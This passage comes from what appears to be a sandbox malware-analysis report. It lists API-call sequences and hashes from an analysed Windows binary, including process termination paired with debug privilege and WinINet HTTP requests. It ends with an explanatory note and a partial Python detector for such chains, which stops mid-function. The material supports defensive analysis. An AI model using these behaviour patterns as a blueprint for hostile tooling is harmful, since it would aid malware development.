                                                                                                    • Opcode Fuzzy Hash: ff6c9c51e85d5ed378b9153680cadfa409a7e291cafa919a84ea1c452ba80995
                                                                                                    • Instruction Fuzzy Hash: 33416EB8A1130AEFDB14DFA5E858AAA7BB9FF0A314F144058FA4597391D731A920CF50
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    APIs
                                                                                                      • Part of subcall function 0017B25F: _wcslen.LIBCMT ref: 0017B269
                                                                                                      • Part of subcall function 001D4536: GetClassNameW.USER32(?,?,000000FF), ref: 001D4559
                                                                                                    • SendMessageW.USER32(?,0000018C,000000FF,00020000), ref: 001D27F4
                                                                                                    • GetDlgCtrlID.USER32 ref: 001D27FF
                                                                                                    • GetParent.USER32 ref: 001D281B
                                                                                                    • SendMessageW.USER32(00000000,?,00000111,?), ref: 001D281E
                                                                                                    • GetDlgCtrlID.USER32(?), ref: 001D2827
                                                                                                    • GetParent.USER32(?), ref: 001D283B
                                                                                                    • SendMessageW.USER32(00000000,?,00000111,?), ref: 001D283E
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.1605808658.0000000000171000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00170000, based on PE: true
                                                                                                    • Associated: 00000006.00000002.1605754470.0000000000170000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                    • Associated: 00000006.00000002.1605954628.000000000020D000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                    • Associated: 00000006.00000002.1605954628.0000000000233000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                    • Associated: 00000006.00000002.1606042874.000000000023D000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                    • Associated: 00000006.00000002.1606093728.0000000000245000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_170000_ewdbwwfpdh.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: MessageSend$CtrlParent$ClassName_wcslen
                                                                                                    • String ID: ComboBox$ListBox
                                                                                                    • API String ID: 711023334-1403004172
                                                                                                    • Opcode ID: 1c4b08c68b2c3feb73ec256919dc71a9a2bbb00685b56b1255eb08c77cbabbcd
                                                                                                    • Instruction ID: 0e449095565254a3de3027a52e61ba7a95eec93b4d589459388c49376647cc66
                                                                                                    • Opcode Fuzzy Hash: 1c4b08c68b2c3feb73ec256919dc71a9a2bbb00685b56b1255eb08c77cbabbcd
                                                                                                    • Instruction Fuzzy Hash: BF21C274D00218BBCF15AFA0DC89EEEBBB9EF25310F104156F961A72A2CB755805DB60
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    APIs
                                                                                                      • Part of subcall function 0017B25F: _wcslen.LIBCMT ref: 0017B269
                                                                                                      • Part of subcall function 001D4536: GetClassNameW.USER32(?,?,000000FF), ref: 001D4559
                                                                                                    • SendMessageW.USER32(?,00000186,00020000,00000000), ref: 001D28D3
                                                                                                    • GetDlgCtrlID.USER32 ref: 001D28DE
                                                                                                    • GetParent.USER32 ref: 001D28FA
                                                                                                    • SendMessageW.USER32(00000000,?,00000111,?), ref: 001D28FD
                                                                                                    • GetDlgCtrlID.USER32(?), ref: 001D2906
                                                                                                    • GetParent.USER32(?), ref: 001D291A
                                                                                                    • SendMessageW.USER32(00000000,?,00000111,?), ref: 001D291D
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.1605808658.0000000000171000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00170000, based on PE: true
                                                                                                    • Associated: 00000006.00000002.1605754470.0000000000170000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                    • Associated: 00000006.00000002.1605954628.000000000020D000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                    • Associated: 00000006.00000002.1605954628.0000000000233000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                    • Associated: 00000006.00000002.1606042874.000000000023D000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                    • Associated: 00000006.00000002.1606093728.0000000000245000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_170000_ewdbwwfpdh.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: MessageSend$CtrlParent$ClassName_wcslen
                                                                                                    • String ID: ComboBox$ListBox
                                                                                                    • API String ID: 711023334-1403004172
                                                                                                    • Opcode ID: fdde0cf8303b4ef0bbbe50f0e03712f7565b1cef5adcee9a87bf4a2e7e1231a6
                                                                                                    • Instruction ID: 2d725fb3dfcea946d81e82da70b3759163e79df5d4cb4b086972092ced7f0641
                                                                                                    • Opcode Fuzzy Hash: fdde0cf8303b4ef0bbbe50f0e03712f7565b1cef5adcee9a87bf4a2e7e1231a6
                                                                                                    • Instruction Fuzzy Hash: 8D21F675D00218BBCF15AFA0EC89EEEBBB8EF25300F104156F951A32A6D7755815DF60
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    APIs
                                                                                                    • SendMessageW.USER32(?,0000101F,00000000,00000000), ref: 002043FC
                                                                                                    • SendMessageW.USER32(00000000,?,0000101F,00000000), ref: 002043FF
                                                                                                    • GetWindowLongW.USER32(?,000000F0), ref: 00204426
                                                                                                    • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00204449
                                                                                                    • SendMessageW.USER32(?,0000104D,00000000,00000007), ref: 002044C1
                                                                                                    • SendMessageW.USER32(?,00001074,00000000,00000007), ref: 0020450B
                                                                                                    • SendMessageW.USER32(?,00001057,00000000,00000000), ref: 00204526
                                                                                                    • SendMessageW.USER32(?,0000101D,00001004,00000000), ref: 00204541
                                                                                                    • SendMessageW.USER32(?,0000101E,00001004,00000000), ref: 00204555
                                                                                                    • SendMessageW.USER32(?,00001008,00000000,00000007), ref: 00204572
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.1605808658.0000000000171000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00170000, based on PE: true
                                                                                                    • Associated: 00000006.00000002.1605754470.0000000000170000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                    • Associated: 00000006.00000002.1605954628.000000000020D000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                    • Associated: 00000006.00000002.1605954628.0000000000233000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                    • Associated: 00000006.00000002.1606042874.000000000023D000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                    • Associated: 00000006.00000002.1606093728.0000000000245000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_170000_ewdbwwfpdh.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: MessageSend$LongWindow
                                                                                                    • String ID:
                                                                                                    • API String ID: 312131281-0
                                                                                                    • Opcode ID: e30cbf51bcede0e6d1a13ed04e19da147c014d7ce2f0d1731da2e2d4e66515cf
                                                                                                    • Instruction ID: b8a12fd2a30b6e1d3a935c4df468965b5360d885950c1e0dbedc75600dcb4dc5
                                                                                                    • Opcode Fuzzy Hash: e30cbf51bcede0e6d1a13ed04e19da147c014d7ce2f0d1731da2e2d4e66515cf
                                                                                                    • Instruction Fuzzy Hash: 3A617CB5900308AFDB21DFA4DC85EEE77B8EB09310F504159FA14A72E2C770AA55DF60
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    APIs
                                                                                                    • InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 001ECBCF
                                                                                                    • HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 001ECBF7
                                                                                                    • HttpQueryInfoW.WININET(00000000,00000005,?,?,?), ref: 001ECC27
                                                                                                    • GetLastError.KERNEL32 ref: 001ECC7F
                                                                                                    • SetEvent.KERNEL32(?), ref: 001ECC93
                                                                                                    • InternetCloseHandle.WININET(00000000), ref: 001ECC9E
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.1605808658.0000000000171000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00170000, based on PE: true
                                                                                                    • Associated: 00000006.00000002.1605754470.0000000000170000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                    • Associated: 00000006.00000002.1605954628.000000000020D000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                    • Associated: 00000006.00000002.1605954628.0000000000233000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                    • Associated: 00000006.00000002.1606042874.000000000023D000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                    • Associated: 00000006.00000002.1606093728.0000000000245000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_170000_ewdbwwfpdh.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: HttpInternet$CloseErrorEventHandleInfoLastOpenQueryRequestSend
                                                                                                    • String ID:
                                                                                                    • API String ID: 3113390036-3916222277
                                                                                                    • Opcode ID: f857faef827b01e05fda7614cee1a63becff6baac5d5b0356096ff9b6284bd46
                                                                                                    • Instruction ID: 01e7e665391ff9b7779df2d5980093ba8299cc60b8d23fd5296215123dd44b13
                                                                                                    • Opcode Fuzzy Hash: f857faef827b01e05fda7614cee1a63becff6baac5d5b0356096ff9b6284bd46
                                                                                                    • Instruction Fuzzy Hash: A531AEB1500B44AFD7219FA6DD88AAF7BFCEB59744B20051EF84AD3211DB30D9069BA1
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    APIs
                                                                                                    • GetModuleHandleW.KERNEL32(00000000,?,?,00000FFF,00000000,?,001B5437,?,?,Bad directive syntax error,0020DCD0,00000000,00000010,?,?), ref: 001DA14B
                                                                                                    • LoadStringW.USER32(00000000,?,001B5437,?), ref: 001DA152
                                                                                                      • Part of subcall function 0017B25F: _wcslen.LIBCMT ref: 0017B269
                                                                                                    • MessageBoxW.USER32(00000000,00000001,00000001,00011010), ref: 001DA216
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.1605808658.0000000000171000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00170000, based on PE: true
                                                                                                    • Associated: 00000006.00000002.1605754470.0000000000170000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                    • Associated: 00000006.00000002.1605954628.000000000020D000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                    • Associated: 00000006.00000002.1605954628.0000000000233000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                    • Associated: 00000006.00000002.1606042874.000000000023D000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                    • Associated: 00000006.00000002.1606093728.0000000000245000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_170000_ewdbwwfpdh.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: HandleLoadMessageModuleString_wcslen
                                                                                                    • String ID: Error: $%s (%d) : ==> %s.: %s %s$.$Line %d (File "%s"):$Line %d:
                                                                                                    • API String ID: 858772685-4153970271
                                                                                                    • Opcode ID: 8c87eca8e999fcb7f8e8f53782318235927d1e9b472a30c8a2d700e9cc297322
                                                                                                    • Instruction ID: fc1474de6088d11a88dd840754a9f48e5ec6e450e0da9a9120d6c54229373e52
                                                                                                    • Opcode Fuzzy Hash: 8c87eca8e999fcb7f8e8f53782318235927d1e9b472a30c8a2d700e9cc297322
                                                                                                    • Instruction Fuzzy Hash: D421807181431EAFCF11EF90CC4AEEE7B39BF28304F048456F519650A2DB71AA28EB11
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    APIs
                                                                                                    • GetParent.USER32 ref: 001D293B
                                                                                                    • GetClassNameW.USER32(00000000,?,00000100), ref: 001D2950
                                                                                                    • SendMessageW.USER32(00000000,00000111,0000702B,00000000), ref: 001D29DD
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.1605808658.0000000000171000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00170000, based on PE: true
                                                                                                    • Associated: 00000006.00000002.1605754470.0000000000170000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                    • Associated: 00000006.00000002.1605954628.000000000020D000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                    • Associated: 00000006.00000002.1605954628.0000000000233000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                    • Associated: 00000006.00000002.1606042874.000000000023D000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                    • Associated: 00000006.00000002.1606093728.0000000000245000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_170000_ewdbwwfpdh.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: ClassMessageNameParentSend
                                                                                                    • String ID: SHELLDLL_DefView$details$largeicons$list$smallicons
                                                                                                    • API String ID: 1290815626-3381328864
                                                                                                    • Opcode ID: 63068f83e8703e2a71c36fa2be17de03ecf18643a655efcf99e9b3bd43b664a8
                                                                                                    • Instruction ID: 7c40ba02ef1f9ee8efd914b9fe46a39f9ea7f3d7cda0ee208f3031dc427ab05c
                                                                                                    • Opcode Fuzzy Hash: 63068f83e8703e2a71c36fa2be17de03ecf18643a655efcf99e9b3bd43b664a8
                                                                                                    • Instruction Fuzzy Hash: 711106BA284316BAFE082264EC1BCE6B7DD8F32728F204113F910F51D2EB7269525954
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    APIs
                                                                                                    • InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 001ECADF
                                                                                                    • GetLastError.KERNEL32 ref: 001ECAF2
                                                                                                    • SetEvent.KERNEL32(?), ref: 001ECB06
                                                                                                      • Part of subcall function 001ECBB0: InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 001ECBCF
                                                                                                      • Part of subcall function 001ECBB0: GetLastError.KERNEL32 ref: 001ECC7F
                                                                                                      • Part of subcall function 001ECBB0: SetEvent.KERNEL32(?), ref: 001ECC93
                                                                                                      • Part of subcall function 001ECBB0: InternetCloseHandle.WININET(00000000), ref: 001ECC9E
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.1605808658.0000000000171000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00170000, based on PE: true
                                                                                                    • Associated: 00000006.00000002.1605754470.0000000000170000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                    • Associated: 00000006.00000002.1605954628.000000000020D000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                    • Associated: 00000006.00000002.1605954628.0000000000233000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                    • Associated: 00000006.00000002.1606042874.000000000023D000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                    • Associated: 00000006.00000002.1606093728.0000000000245000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_170000_ewdbwwfpdh.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Internet$ErrorEventLast$CloseConnectHandleOpen
                                                                                                    • String ID:
                                                                                                    • API String ID: 337547030-0
                                                                                                    • Opcode ID: 43245cf8fd58672d8f910a692b3bf773fce873fce9f814c08c7e59663c57a0f7
                                                                                                    • Instruction ID: 979adde8270571933a8101de4dd6379677c621a484ee10c14b8987d23da00974
                                                                                                    • Opcode Fuzzy Hash: 43245cf8fd58672d8f910a692b3bf773fce873fce9f814c08c7e59663c57a0f7
                                                                                                    • Instruction Fuzzy Hash: DF318D71601B45AFDB219FB6DD49AABBBF8FF48390B04441DF85683621D730E812DBA0
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    APIs
                                                                                                    • GetProcessHeap.KERNEL32(00000008,0000000C,?,00000000,?,001D1CD9,?,?,00000000), ref: 001D209C
                                                                                                    • HeapAlloc.KERNEL32(00000000,?,001D1CD9,?,?,00000000), ref: 001D20A3
                                                                                                    • GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002,?,001D1CD9,?,?,00000000), ref: 001D20B8
                                                                                                    • GetCurrentProcess.KERNEL32(?,00000000,?,001D1CD9,?,?,00000000), ref: 001D20C0
                                                                                                    • DuplicateHandle.KERNEL32(00000000,?,001D1CD9,?,?,00000000), ref: 001D20C3
                                                                                                    • GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002,?,001D1CD9,?,?,00000000), ref: 001D20D3
                                                                                                    • GetCurrentProcess.KERNEL32(001D1CD9,00000000,?,001D1CD9,?,?,00000000), ref: 001D20DB
                                                                                                    • DuplicateHandle.KERNEL32(00000000,?,001D1CD9,?,?,00000000), ref: 001D20DE
                                                                                                    • CreateThread.KERNEL32(00000000,00000000,001D2104,00000000,00000000,00000000), ref: 001D20F8
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.1605808658.0000000000171000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00170000, based on PE: true
                                                                                                    • Associated: 00000006.00000002.1605754470.0000000000170000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                    • Associated: 00000006.00000002.1605954628.000000000020D000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                    • Associated: 00000006.00000002.1605954628.0000000000233000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                    • Associated: 00000006.00000002.1606042874.000000000023D000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                    • Associated: 00000006.00000002.1606093728.0000000000245000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_170000_ewdbwwfpdh.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Process$Current$DuplicateHandleHeap$AllocCreateThread
                                                                                                    • String ID:
                                                                                                    • API String ID: 1957940570-0
                                                                                                    • Opcode ID: 27e9d208d99fa177a48507360bea3335e34dd6d725654d89da7eee5bbaac2844
                                                                                                    • Instruction ID: 0a902dd82f40f06d62de2fd0ea30b46be4fa27033d2816053bd3e7f1ed67d91f
                                                                                                    • Opcode Fuzzy Hash: 27e9d208d99fa177a48507360bea3335e34dd6d725654d89da7eee5bbaac2844
                                                                                                    • Instruction Fuzzy Hash: 1501CDB5241308BFE710AFA5EC4DF6B7BACEB89711F008411FA05DB2A2CA749800CB20
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    APIs
                                                                                                      • Part of subcall function 001DDC9C: CreateToolhelp32Snapshot.KERNEL32 ref: 001DDCC1
                                                                                                      • Part of subcall function 001DDC9C: Process32FirstW.KERNEL32(00000000,?), ref: 001DDCCF
                                                                                                      • Part of subcall function 001DDC9C: FindCloseChangeNotification.KERNELBASE(00000000), ref: 001DDD9C
                                                                                                    • OpenProcess.KERNEL32(00000001,00000000,?), ref: 001FAACC
                                                                                                    • GetLastError.KERNEL32 ref: 001FAADF
                                                                                                    • OpenProcess.KERNEL32(00000001,00000000,?), ref: 001FAB12
                                                                                                    • TerminateProcess.KERNEL32(00000000,00000000), ref: 001FABC7
                                                                                                    • GetLastError.KERNEL32(00000000), ref: 001FABD2
                                                                                                    • CloseHandle.KERNEL32(00000000), ref: 001FAC23
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.1605808658.0000000000171000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00170000, based on PE: true
                                                                                                    • Associated: 00000006.00000002.1605754470.0000000000170000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                    • Associated: 00000006.00000002.1605954628.000000000020D000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                    • Associated: 00000006.00000002.1605954628.0000000000233000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                    • Associated: 00000006.00000002.1606042874.000000000023D000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                    • Associated: 00000006.00000002.1606093728.0000000000245000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_170000_ewdbwwfpdh.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Process$CloseErrorLastOpen$ChangeCreateFindFirstHandleNotificationProcess32SnapshotTerminateToolhelp32
                                                                                                    • String ID: SeDebugPrivilege
                                                                                                    • API String ID: 1701285019-2896544425
                                                                                                    • Opcode ID: d033dc14646e153ec692d9eab6563fb1b45f29ad9a687ceb27cf9d565b6716e5
                                                                                                    • Instruction ID: 6fa33aa86b0d9fdabc643c15fed7c192ff99e8339416b011054e38de7a2aec1d
                                                                                                    • Opcode Fuzzy Hash: d033dc14646e153ec692d9eab6563fb1b45f29ad9a687ceb27cf9d565b6716e5
                                                                                                    • Instruction Fuzzy Hash: 9B618F70204602AFD324DF14C498F26BBE5AF54318F58C49CE56A4B7A3CB79ED45CB92
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    APIs
                                                                                                    • SendMessageW.USER32(00000000,00001036,00000010,00000010), ref: 00204284
                                                                                                    • SendMessageW.USER32(00000000,00001036,00000000,?), ref: 00204299
                                                                                                    • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000013), ref: 002042B3
                                                                                                    • _wcslen.LIBCMT ref: 002042F8
                                                                                                    • SendMessageW.USER32(?,00001057,00000000,?), ref: 00204325
                                                                                                    • SendMessageW.USER32(?,00001061,?,0000000F), ref: 00204353
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.1605808658.0000000000171000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00170000, based on PE: true
                                                                                                    • Associated: 00000006.00000002.1605754470.0000000000170000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                    • Associated: 00000006.00000002.1605954628.000000000020D000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                    • Associated: 00000006.00000002.1605954628.0000000000233000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                    • Associated: 00000006.00000002.1606042874.000000000023D000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                    • Associated: 00000006.00000002.1606093728.0000000000245000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_170000_ewdbwwfpdh.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: MessageSend$Window_wcslen
                                                                                                    • String ID: SysListView32
                                                                                                    • API String ID: 2147712094-78025650
                                                                                                    • Opcode ID: ed4b708a10436fcdfb58853f576b49b34000df5242d64094a02027ca28acde33
                                                                                                    • Instruction ID: 402110361646f61ca37636bc37850b05aa557c634c318015f0723d9b88d6f8da
                                                                                                    • Opcode Fuzzy Hash: ed4b708a10436fcdfb58853f576b49b34000df5242d64094a02027ca28acde33
                                                                                                    • Instruction Fuzzy Hash: 5941C271A10309AFDB21AFA4CC49FEA7BA9FF08350F104126FA54E71D2D77099A0CB90
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    APIs
                                                                                                    • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 001DC5D9
                                                                                                    • IsMenu.USER32(00000000), ref: 001DC5F9
                                                                                                    • CreatePopupMenu.USER32 ref: 001DC62F
                                                                                                    • GetMenuItemCount.USER32(00F36198), ref: 001DC680
                                                                                                    • InsertMenuItemW.USER32(00F36198,?,00000001,00000030), ref: 001DC6A8
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.1605808658.0000000000171000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00170000, based on PE: true
                                                                                                    • Associated: 00000006.00000002.1605754470.0000000000170000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                    • Associated: 00000006.00000002.1605954628.000000000020D000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                    • Associated: 00000006.00000002.1605954628.0000000000233000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                    • Associated: 00000006.00000002.1606042874.000000000023D000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                    • Associated: 00000006.00000002.1606093728.0000000000245000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_170000_ewdbwwfpdh.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Menu$Item$CountCreateInfoInsertPopup
                                                                                                    • String ID: 0$2
                                                                                                    • API String ID: 93392585-3793063076
                                                                                                    • Opcode ID: 2a8a2d4850ab59c78e40b0fcdc438bd809b64fe92dccfe2f15e627297d5f6b97
                                                                                                    • Instruction ID: 4135e5ef107707ed071d55558b96d454347625bae168df9ed549e05374c61e44
                                                                                                    • Opcode Fuzzy Hash: 2a8a2d4850ab59c78e40b0fcdc438bd809b64fe92dccfe2f15e627297d5f6b97
                                                                                                    • Instruction Fuzzy Hash: 9F51D370A01306ABDF20CFA8D988BEEBFF5AF54314F14595AE811973A1E770D940CBA1
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    APIs
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.1605808658.0000000000171000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00170000, based on PE: true
                                                                                                    • Associated: 00000006.00000002.1605754470.0000000000170000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                    • Associated: 00000006.00000002.1605954628.000000000020D000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                    • Associated: 00000006.00000002.1605954628.0000000000233000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                    • Associated: 00000006.00000002.1606042874.000000000023D000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                    • Associated: 00000006.00000002.1606093728.0000000000245000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_170000_ewdbwwfpdh.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: CleanupStartup_strcatgethostbynamegethostnameinet_ntoa
                                                                                                    • String ID: 0.0.0.0
                                                                                                    • API String ID: 642191829-3771769585
                                                                                                    • Opcode ID: a8f2f1a7cbcff3d96887467f8086b794b120de6ebf43a0fb3e1a0225363d4a1e
                                                                                                    • Instruction ID: f0d1b567b43b627f59a08cd5c9ce2094c15d37d182e8b7536571defe19450571
                                                                                                    • Opcode Fuzzy Hash: a8f2f1a7cbcff3d96887467f8086b794b120de6ebf43a0fb3e1a0225363d4a1e
                                                                                                    • Instruction Fuzzy Hash: BF110371900215ABDF247BB0AC4EEEE77FCEF24711F11016AF54596192EF70CA829A90
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

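Two of the entries above are the ones a triage analyst cares about: the routine that walks a Toolhelp32 snapshot and calls OpenProcess/TerminateProcess next to the string "SeDebugPrivilege" (a process-kill primitive), and the one whose API ID concatenates gethostname/gethostbyname/inet_ntoa with the fallback string "0.0.0.0" (local IP discovery). The following Python is an added example, not Joe Sandbox code and not part of this report: it parses function-similarity entries in the text layout shown on this page and flags API chains against a small rule table. The sample entries embedded in it are constructed from the report lines above (trimmed), and the rule names and thresholds are the author's own.

```python
"""Parse Joe Sandbox function-similarity entries and flag risky API chains."""
import re
from dataclasses import dataclass, field

# Constructed sample in the same layout as the report entries above (trimmed).
SAMPLE = """\
APIs
  • Part of subcall function 001DDC9C: CreateToolhelp32Snapshot.KERNEL32 ref: 001DDCC1
  • Part of subcall function 001DDC9C: Process32FirstW.KERNEL32(00000000,?), ref: 001DDCCF
• OpenProcess.KERNEL32(00000001,00000000,?), ref: 001FAACC
• TerminateProcess.KERNEL32(00000000,00000000), ref: 001FABC7
• CloseHandle.KERNEL32(00000000), ref: 001FAC23
Strings
Memory Dump Source
• Source File: 00000006.00000002.1605808658.0000000000171000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00170000, based on PE: true
Similarity
• API ID: Process$CloseErrorLastOpen$ChangeCreateFindFirstHandleNotificationProcess32SnapshotTerminateToolhelp32
• String ID: SeDebugPrivilege
• Opcode ID: d033dc14646e153ec692d9eab6563fb1b45f29ad9a687ceb27cf9d565b6716e5
Uniqueness

Uniqueness Score: -1.00%

APIs
• SendMessageW.USER32(00000000,00001036,00000010,00000010), ref: 00204284
• SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000013), ref: 002042B3
Strings
Similarity
• API ID: MessageSend$Window_wcslen
• String ID: SysListView32
• Opcode ID: ed4b708a10436fcdfb58853f576b49b34000df5242d64094a02027ca28acde33
Uniqueness

Uniqueness Score: -1.00%

APIs
Strings
Similarity
• API ID: CleanupStartup_strcatgethostbynamegethostnameinet_ntoa
• String ID: 0.0.0.0
• Opcode ID: a8f2f1a7cbcff3d96887467f8086b794b120de6ebf43a0fb3e1a0225363d4a1e
Uniqueness

Uniqueness Score: -1.00%
"""


@dataclass
class Entry:
    apis: set = field(default_factory=set)   # normalized API names seen in the APIs list
    api_id: str = ""                         # Joe Sandbox's concatenated, lossy API summary
    string_id: str = ""
    opcode_id: str = ""


# "• Name.MODULE(args), ref: ..." with an optional "Part of subcall function XXXX:" prefix
API_RE = re.compile(
    r"^\s*•\s*(?:Part of subcall function [0-9A-Fa-f]+:\s*)?([A-Za-z_][A-Za-z0-9_]*)\.[A-Z0-9]+"
)
FIELD_RE = re.compile(r"^\s*•\s*(API ID|String ID|Opcode ID):\s*(.*)$")


def normalize(name):
    """Drop the A/W suffix so Process32FirstW and Process32First match the same rule."""
    return re.sub(r"(?<=[a-z0-9])[AW]$", "", name)


def parse_entries(text):
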